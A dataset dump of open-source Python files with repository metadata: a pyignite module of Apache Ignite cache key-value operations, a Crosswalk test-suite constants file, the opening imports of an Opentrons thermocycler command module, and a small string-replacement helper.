Column schema (29 columns). Each record below is one `|`-separated metadata line in this column order, followed by the file `content` and a closing `| avg_line_length | max_line_length | alphanum_fraction |` line:

| column | dtype | range / values |
|---|---|---|
| hexsha | string | length 40 |
| size | int64 | 5 – 2.06M |
| ext | string | 11 distinct values |
| lang | string | 1 distinct value |
| max_stars_repo_path | string | length 3–251 |
| max_stars_repo_name | string | length 4–130 |
| max_stars_repo_head_hexsha | string | length 40–78 |
| max_stars_repo_licenses | list | length 1–10 |
| max_stars_count | int64 (nullable) | 1 – 191k |
| max_stars_repo_stars_event_min_datetime | string (nullable) | length 24 |
| max_stars_repo_stars_event_max_datetime | string (nullable) | length 24 |
| max_issues_repo_path | string | length 3–251 |
| max_issues_repo_name | string | length 4–130 |
| max_issues_repo_head_hexsha | string | length 40–78 |
| max_issues_repo_licenses | list | length 1–10 |
| max_issues_count | int64 (nullable) | 1 – 116k |
| max_issues_repo_issues_event_min_datetime | string (nullable) | length 24 |
| max_issues_repo_issues_event_max_datetime | string (nullable) | length 24 |
| max_forks_repo_path | string | length 3–251 |
| max_forks_repo_name | string | length 4–130 |
| max_forks_repo_head_hexsha | string | length 40–78 |
| max_forks_repo_licenses | list | length 1–10 |
| max_forks_count | int64 (nullable) | 1 – 105k |
| max_forks_repo_forks_event_min_datetime | string (nullable) | length 24 |
| max_forks_repo_forks_event_max_datetime | string (nullable) | length 24 |
| content | string | length 1 – 1.05M |
| avg_line_length | float64 | 1 – 1.02M |
| max_line_length | int64 | 3 – 1.04M |
| alphanum_fraction | float64 | 0 – 1 |
6a0e0bcfcfbc438530da36eb95d62a35b14a3931 | 33,998 | py | Python | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | ["Apache-2.0", "CC0-1.0"] | 1 | 2019-03-11T08:52:37.000Z | 2019-03-11T08:52:37.000Z | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | ["Apache-2.0", "CC0-1.0"] | null | null | null | modules/platforms/python/pyignite/api/key_value.py | DirectXceriD/gridgain | 093e512a9147e266f83f6fe1cf088c0b037b501c | ["Apache-2.0", "CC0-1.0"] | null | null | null |
# GridGain Community Edition Licensing
# Copyright 2019 GridGain Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License") modified with Commons Clause
# Restriction; you may not use this file except in compliance with the License. You may obtain a
# copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the
# License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
#
# Commons Clause Restriction
#
# The Software is provided to you by the Licensor under the License, as defined below, subject to
# the following condition.
#
# Without limiting other conditions in the License, the grant of rights under the License will not
# include, and the License does not grant to you, the right to Sell the Software.
# For purposes of the foregoing, Sell means practicing any or all of the rights granted to you
# under the License to provide to third parties, for a fee or other consideration (including without
# limitation fees for hosting or consulting/ support services related to the Software), a product or
# service whose value derives, entirely or substantially, from the functionality of the Software.
# Any license notice or attribution required by the License must also include this Commons Clause
# License Condition notice.
#
# For purposes of the clause above, the Licensor is Copyright 2019 GridGain Systems, Inc.,
# the License is the Apache License, Version 2.0, and the Software is the GridGain Community
# Edition software provided with this notice.
from typing import Iterable, Union
from pyignite.queries.op_codes import *
from pyignite.datatypes import (
Map, Bool, Byte, Int, Long, AnyDataArray, AnyDataObject,
)
from pyignite.datatypes.key_value import PeekModes
from pyignite.queries import Query, Response
from pyignite.utils import cache_id
def cache_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache (overwriting existing value if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if a value
is written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(connection, {
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
})
def cache_get(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves a value from cache by key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a value
retrieved on success, non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_GET,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status != 0:
return result
result.value = result.value['value']
return result
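# --- Editor's usage sketch (illustrative; not part of the original module).
# A minimal put/get round trip against a local server. The `Connection`
# import, the address 127.0.0.1:10800 and the cache name 'my_cache' are
# assumptions, not taken from this file.
def _example_put_get():
    from pyignite.connection import Connection

    conn = Connection()
    conn.connect('127.0.0.1', 10800)  # default Ignite thin client port
    res = cache_put(conn, 'my_cache', 'answer', 42)
    assert res.status == 0
    res = cache_get(conn, 'my_cache', 'answer')
    return res.value  # 42 on success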
def cache_get_all(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Retrieves multiple key-value pairs from cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a dict, made of
retrieved key-value pairs, non-zero status and an error description
on failure.
"""
query_struct = Query(
OP_CACHE_GET_ALL,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('data', Map),
],
)
if result.status == 0:
result.value = dict(result.value)['data']
return result
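# --- Editor's sketch (illustrative; not part of the original module). Keys
# may be passed plain or as (key, type_hint) tuples when the Ignite type
# cannot be inferred from the Python value; `conn` and 'my_cache' are assumed.
def _example_get_all(conn):
    from pyignite.datatypes import IntObject

    res = cache_get_all(conn, 'my_cache', [1, (2, IntObject)])
    return res.value if res.status == 0 else {}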
def cache_put_all(
connection: 'Connection', cache: Union[str, int], pairs: dict,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts multiple key-value pairs to cache (overwriting existing associations
if any).
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
    :param pairs: a dictionary of key-value pairs to save. Each key or value
     can be an item of representable Python type or a tuple of (item, hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status if key-value pairs
are written, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_ALL,
[
('hash_code', Int),
('flag', Byte),
('data', Map),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'data': pairs,
},
)
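# --- Editor's sketch (illustrative; not part of the original module). All
# pairs are written in a single network round trip; `conn` and the cache
# name are assumptions.
def _example_put_all(conn):
    res = cache_put_all(conn, 'my_cache', {'a': 1, 'b': 2})
    return res.status == 0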
def cache_contains_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Returns a value indicating whether the given key is present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when key is present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_contains_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Returns a value indicating whether all given keys are present in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: a list of keys or (key, type hint) tuples,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a bool value
retrieved on success: `True` when all keys are present, `False` otherwise,
non-zero status and an error description on failure.
"""
query_struct = Query(
OP_CACHE_CONTAINS_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
response_config=[
('value', Bool),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_put(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, and returns the previous value
    for that key, or null value if there was no such key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None if a value is written, non-zero status and an error description
in case of error.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache, returning previous value
for that key, if and only if there is a value currently mapped
for that key.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REPLACE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_get_and_remove(
connection: 'Connection', cache: Union[str, int], key,
key_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Removes the cache entry with the specified key, returning the value.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_REMOVE, [
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key
does not already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_get_and_put_if_absent(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key does not
already exist.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: (optional) pass True to keep the value in binary form. False
by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and an old value
or None on success, non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_GET_AND_PUT_IF_ABSENT,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('value', AnyDataObject),
],
)
if result.status == 0:
result.value = result.value['value']
return result
def cache_replace(
connection: 'Connection', cache: Union[str, int], key, value,
key_hint=None, value_hint=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Puts a value with a given key to cache only if the key already exists.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry. Can be of any supported type,
:param value: value for the key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted.
:param binary: pass True to keep the value in binary form. False
by default,
:param query_id: a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_replace_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample, value,
key_hint=None, sample_hint=None, value_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
Puts a value with a given key to cache only if the key already exists
    and the stored value equals the provided sample.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param value: new value for the given key,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
    :param sample_hint: (optional) Ignite data type, for which
     the given sample should be converted,
:param value_hint: (optional) Ignite data type, for which the given value
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REPLACE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
('value', value_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
'value': value,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
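# --- Editor's sketch (illustrative; not part of the original module). A
# compare-and-set style update: the write happens only if the stored value
# still equals `old`. `conn` is an assumed, already connected Connection.
def _example_cas(conn, key, old, new):
    res = cache_replace_if_equals(conn, 'my_cache', key, old, new)
    return res.status == 0 and res.value  # True only if the swap happened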
def cache_clear(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Clears the cache without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_clear_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache key without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
)
def cache_clear_keys(
connection: 'Connection', cache: Union[str, int], keys: list,
binary=False, query_id=None,
) -> 'APIResult':
"""
Clears the cache keys without notifying listeners or cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_CLEAR_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_key(
connection: 'Connection', cache: Union[str, int], key,
key_hint: object=None, binary=False, query_id=None,
) -> 'APIResult':
"""
    Removes an entry with a given key, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEY,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_if_equals(
connection: 'Connection', cache: Union[str, int], key, sample,
key_hint=None, sample_hint=None,
binary=False, query_id=None,
) -> 'APIResult':
"""
    Removes an entry with a given key if the provided value is equal to
    the actual stored value, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param key: key for the cache entry,
:param sample: a sample to compare the stored value with,
:param key_hint: (optional) Ignite data type, for which the given key
should be converted,
    :param sample_hint: (optional) Ignite data type, for which
     the given sample should be converted,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned
as-is in response.query_id. When the parameter is omitted, a random
value is generated,
:return: API result data object. Contains zero status and a boolean
success code, or non-zero status and an error description if something
has gone wrong.
"""
query_struct = Query(
OP_CACHE_REMOVE_IF_EQUALS,
[
('hash_code', Int),
('flag', Byte),
('key', key_hint or AnyDataObject),
('sample', sample_hint or AnyDataObject),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'key': key,
'sample': sample,
},
response_config=[
('success', Bool),
],
)
if result.status == 0:
result.value = result.value['success']
return result
def cache_remove_keys(
connection: 'Connection', cache: Union[str, int], keys: Iterable,
binary=False, query_id=None,
) -> 'APIResult':
"""
Removes entries with given keys, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param keys: list of keys or tuples of (key, key_hint),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_KEYS,
[
('hash_code', Int),
('flag', Byte),
('keys', AnyDataArray()),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'keys': keys,
},
)
def cache_remove_all(
connection: 'Connection', cache: Union[str, int], binary=False,
query_id=None,
) -> 'APIResult':
"""
Removes all entries from cache, notifying listeners and cache writers.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status on success,
non-zero status and an error description otherwise.
"""
query_struct = Query(
OP_CACHE_REMOVE_ALL,
[
('hash_code', Int),
('flag', Byte),
],
query_id=query_id,
)
return query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
},
)
def cache_get_size(
connection: 'Connection', cache: Union[str, int], peek_modes=0,
binary=False, query_id=None,
) -> 'APIResult':
"""
Gets the number of entries in cache.
:param connection: connection to Ignite server,
:param cache: name or ID of the cache,
:param peek_modes: (optional) limit count to near cache partition
(PeekModes.NEAR), primary cache (PeekModes.PRIMARY), or backup cache
(PeekModes.BACKUP). Defaults to all cache partitions (PeekModes.ALL),
:param binary: (optional) pass True to keep the value in binary form.
False by default,
:param query_id: (optional) a value generated by client and returned as-is
in response.query_id. When the parameter is omitted, a random value
is generated,
:return: API result data object. Contains zero status and a number of
cache entries on success, non-zero status and an error description
otherwise.
"""
if not isinstance(peek_modes, (list, tuple)):
if peek_modes == 0:
peek_modes = []
else:
peek_modes = [peek_modes]
query_struct = Query(
OP_CACHE_GET_SIZE,
[
('hash_code', Int),
('flag', Byte),
('peek_modes', PeekModes),
],
query_id=query_id,
)
result = query_struct.perform(
connection,
query_params={
'hash_code': cache_id(cache),
'flag': 1 if binary else 0,
'peek_modes': peek_modes,
},
response_config=[
('count', Long),
],
)
if result.status == 0:
result.value = result.value['count']
return result
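# --- Editor's sketch (illustrative; not part of the original module). A
# single peek mode or a list of modes may be passed; the normalization above
# turns both forms into a list. `conn` is an assumed Connection.
def _example_sizes(conn):
    total = cache_get_size(conn, 'my_cache')  # all partitions (PeekModes.ALL)
    primary = cache_get_size(conn, 'my_cache', peek_modes=PeekModes.PRIMARY)
    return total.value, primary.value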
| 33.561698 | 100 | 0.62789 |
6a0e57de9c3d93fdc79f1a9d3f94690a6652bf6e | 989 | py | Python | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | ["BSD-3-Clause"] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | ["BSD-3-Clause"] | null | null | null | wrt/wrt-manifest-tizen-tests/const.py | linshen/crosswalk-test-suite | e206b2c35fc09e583f3202fc7fc8a656c8e2b5de | ["BSD-3-Clause"] | null | null | null |
#!/usr/bin/env python
import sys, os
import itertools, shutil
path = os.path.abspath(__file__)
path = os.path.split(path)[0]
os.chdir(path)
print(path)
device_ssh_ip = ""
ssh_device = device_ssh_ip.split(",")
path_tcs = path + "/tcs"
path_result = path + "/result"
path_allpairs = path + "/allpairs"
path_resource = path + "/resource"
seed_file = path_allpairs + "/positive/input_seed.txt"
seed_negative = path_allpairs + "/negative"
seed_positive = path_allpairs + "/positive"
seed_file_na = seed_negative + "/input_seed_negative.txt"
selfcomb_file = path_allpairs + "/selfcomb.txt"
output_file = path_allpairs + "/output.txt"
output_file_ne = path_allpairs + "/output_negative.txt"
report_path = path + "/report"
report_file = report_path + "/wrt-manifest-tizen-tests.xml"
report_summary_file = report_path + "/summary.xml"
sh_path = path + "/script"
log_path = report_path + "/log_"
device_path = "/home/app/content/tct/"
run_times = 3
version="6.35.1.2"
name="wrt-manifest-tizen-tests"
| 31.903226 | 59 | 0.743175 |
6a0e7a4577ac3f9f8b9fd994210704a26f91ee39 | 2,606 | py | Python | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | ["Apache-2.0"] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | ["Apache-2.0"] | null | null | null | api/src/opentrons/protocol_engine/commands/thermocycler/open_lid.py | Opentrons/protocol_framework | ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f | ["Apache-2.0"] | null | null | null |
"""Command models to open a Thermocycler's lid."""
from __future__ import annotations
from typing import Optional, TYPE_CHECKING
from typing_extensions import Literal, Type
from pydantic import BaseModel, Field
from ..command import AbstractCommandImpl, BaseCommand, BaseCommandCreate
from opentrons.protocol_engine.types import MotorAxis
if TYPE_CHECKING:
from opentrons.protocol_engine.state import StateView
from opentrons.protocol_engine.execution import EquipmentHandler, MovementHandler
OpenLidCommandType = Literal["thermocycler/openLid"]
| 30.302326 | 87 | 0.699156 |
6a0eabac2607fdcd5104aaa4361b75c94d229375 | 373 | py | Python | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | ["MIT"] | 36 | 2021-11-10T05:17:18.000Z | 2022-03-27T18:25:10.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | ["MIT"] | 1 | 2021-12-03T07:07:18.000Z | 2022-03-08T09:29:03.000Z | deep_utils/nlp/utils/utils.py | pooya-mohammadi/deep_utils | b589d8ab0a8d63f3d3b90c3bc0d4b1b648b8be37 | ["MIT"] | 4 | 2021-11-28T07:39:57.000Z | 2022-03-30T05:46:10.000Z |
def multiple_replace(text: str, chars_to_mapping: dict):
"""
This function is used to replace a dictionary of characters inside a text string
:param text:
:param chars_to_mapping:
:return:
"""
import re
pattern = "|".join(map(re.escape, chars_to_mapping.keys()))
return re.sub(pattern, lambda m: chars_to_mapping[m.group()], str(text))
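if __name__ == '__main__':
    # Editor's example (illustrative; not part of the original file): every
    # mapped character is replaced in a single regex pass over the text.
    print(multiple_replace("a-b_c", {"-": " ", "_": " "}))  # -> "a b c"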
| 31.083333 | 84 | 0.678284 |
